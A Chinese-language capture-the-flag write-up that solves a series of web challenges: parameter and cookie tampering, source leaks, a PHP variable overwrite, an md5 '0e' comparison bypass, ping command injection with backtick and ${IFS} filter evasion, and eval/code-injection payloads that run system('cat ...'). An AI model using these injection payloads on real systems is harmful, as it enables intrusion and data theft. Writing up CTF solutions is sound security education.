您的位置: 首页  >  IT文章  >  【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

分类: IT文章 2024-03-29 09:18:55

源码:

 <?php 
    show_source(__FILE__);
    include 'config.php';
    if(!isset($_GET['args'])){
        die();
    } 
    if ($_GET['args'] === "give_me_flag") {
        echo file_get_contents($flag_of_get); //flag
    }
?>

会判断 $_GET 传参,如果是 args 且值是 give_me_flag,就会打印 flag

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

$_POST

源码

<?php 
    show_source(__FILE__);
    include 'config.php';
    if(!isset($_POST['args'])){
        die();
    } 
    if ($_POST['args'] === "give_me_flag") {
        echo file_get_contents($flag_of_post); //flag
    }
?>

跟上一关一样,只是 GET 变成了 POST,用火狐的 hackbar 传参,拿到 flag

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

$_COOKIE

直接访问会显示:You are not admin,源代码没有任何提示

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

抓包看看:

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

有个 cookie: level=0,改成 1 看看

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

成功拿到 flag

SVN_Leaked

看到 SVN 联想到 SVN 源码泄漏,用工具扫一下

有个 SourceLeakHackerForLinux.py 

github 项目:https://github.com/Err0rzz/SourceLeakHacker

 【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

 【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

一开始各种路径试了试,结果直接访问 .php 文件就可以得到 flag

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

List It

查看源代码,发现有的 admin 的连接,访问!

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

访问以后又看到有个

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

点开就是 flag,怎么感觉这题应该是放在第一道签到题呐。。

change_and_download

发现下载的文件名是 base64 编码的格式

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

之前一下就做出来了,结果第二次想写文章,再一次做这个题的时候死活做不出来

过几天突然试了一下,把后面的改成 ?url=ZG93bmxvYWQucGhw(download.php 的 base64 编码)

把 download.php 下载下来了,然后发现里面有三个.php 文件

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

不能直接传 ?url=flag.php 会显示 Access Forbidden! 

所以传 ?url=ZmxhZy5waHA= 下载下来的文件里就有 flag

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

Guess Random

查看源代码,有个 ?debug=true

 【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

加上以后就有了源码

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

发现了extract($_POST),变量覆盖!!

传参:secretKey=1&password=1,得到 flag

 【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

Guess Random 2

 【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

访问index.php.bak,下载下来 bak 文件

<?php
    require_once 'flag.php';
    if(isset($_GET['mash']) and isset($_GET['hash'])){
     
            $res = sanitize($_GET['mash']);
            $hash = sanitize($_GET['hash']);
                    $secretValue = (rand(5,5555)*555+55555555555);
     
            if(($res != false) and ($hash != false)){
                    if($res.$secretValue == md5($_GET['hash'])){
     
                            echo $flag;
                    }
                    else{
                            echo 'Try Again ! ';
                           
                    }
            }
            else{
                    echo "No!!!";
            }
    }
    else{
            echo "<img src='http://sqlbak.com/blog/wp-content/uploads/2014/02/bak_file.png'>";
    }
     
    //function
    function sanitize($var){
            $valideChar = str_split('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');
            $res = '';
     
            if(isset($var) and !empty($var)){
                    $tmp = str_split($var);
                   
                    foreach($tmp as $value){
                            if(in_array($value,$valideChar)){
                                    $res.=$value;
                            }
                    }
                    return $res;
            }
            else{
                    return false;
            } 
    } 
    ?>

首先 $_GET 传进两个变量,首先会经过 sanitize 进行处理,处理的过程大概就是将传入的字符串分割成一个一个的字符,然后看看在不在 $valideChar 里面,如果在的话就正常返回值

那么正常的输入字符串是没有什么问题的,剩下的就是绕过 MD5 了

只需要 MD5 开头是 0e,PHP 在进行比较运算时,如果遇到了 0exxx 这种字符串,就会将这种字符串解析为科学计数法,因为 0exx 都等于 0,所以让两者相等我们只需再找到一个 MD5 加密后开头为 0exxx 的字符串即可

需要注意的是,第一个参数是不经过 MD5 的,所以需要直接传入 0exxx 开头的,足够 32 位就可以

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

 Ping

命令执行绕过,试了试过滤了一些:一些命令

但是反引号可以执行命令

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

通过拼接,可以拼接出来:ls 命令

127.0.0.1;`a="l";b="s";c=$a$b;$c`

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

可以发现 flag 就是下面那一串 flag_ 开头的字符串

在拼接命令来查看:

127.0.0.1;`a="ca";b="t${IFS}fla";c="g_ae8e4cd6ce3b5";d=$a$b$c;$d`

针对空格过滤,可以使用:

${IFS}

<  (也被过滤了)

$IFS

$IFS$9

来代替,但是考虑到在一串字符串中,所以使用 ${IFS} 来代替空格

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

Easy RCE

查看源码,发现

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

但是传值,总是出现问题,在题目的地方发现,可以查看 hint 

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

查看 hint

<?php
    eval($_GET['name']."!!!");    
?>

后面追加了三个 !!!,所以会有报错

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

知道问题了,只需要绕过就可以了

使用://就可以把 php 代码注释掉

?name=print_r(scandir('./'));//

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

?name=print_r(scandir('../../../'));//

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

 ?name=system('cat ../../../flag_bfe6335f68be16c1');//

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

Code Inject

完全是按照网上的 WP 做的 Orz

点击不要点我链接然后得到源代码,这样可以通过闭合括号来实现代码注入

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

http://198.13.45.199:5007/index.php?code=};phpinfo();//

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

http://198.13.45.199:5007/index.php?code=}system('ls ../../../');//

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

http://198.13.45.199:5007/index.php?code=}system('cat ../../../flag_f4bb6a070d7d979e');//

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

Eval is Evil

源码如下,分析的时候发现 $who 有些特殊,就解码了一下,发现是 flag,同时看到上面的 helper() 函数,就想到可能是需要用 helper() 来解码 $who 传进 flag 去

<?php
highlight_file(__FILE__);


$flag = file_get_contents('/flag_6edb44d39f5479601fb');

$yourinput = $_GET['cmd'];
$funcs_internal = get_defined_functions()['internal'];

function helper($d){
    return base64_decode($d);
}

$who = "ZmxhZw==";

$funcs_extra = array ('eval', 'include', 'require', 'function');
$funny_chars = array ('.', '+','flag', '-', '*', '"', '`', '[', ']', '@', '!', '#', '%', '&', '~');
$variables = array ('_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_FILES', '_ENV', 'HTTP_ENV_VARS', '_SESSION', 'GLOBALS');


$blacklist = array_merge($funcs_internal, $funcs_extra, $funny_chars, $variables);
$yourbro = "who";


$hacked = false;
$why = "";
foreach ($blacklist as $blacklisted) {
    if (preg_match ('/' . $blacklisted . '/im', $yourinput)) {
        $hacked = true;
        $why = $blacklisted;
        break;
    }
}


if ($hacked) {
    die('Hacker Detected,<br/>Reason: '.$why." !");
} else {
    if(isset($yourinput)){
           @eval("echo " . $yourinput . " ;");
    }else{
        echo "Input your command!";
    }
}

构造语句如下:

可以看到是有 flag 回显的,但是这里再往下就不会了 Orz...

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

后来用谷歌搜了一下,发现可以使用 ${helper($who)}

{} 会默认里面是一个变量,会当作变量来执行,这样就 OK 了

【WP】【web】中学生CTF | web部分wp $_GET $_POST $_COOKIE SVN_Leaked List It change_and_download Guess Random Guess Random 2  Ping Easy RCE Code Inject Eval is Evil

相关推荐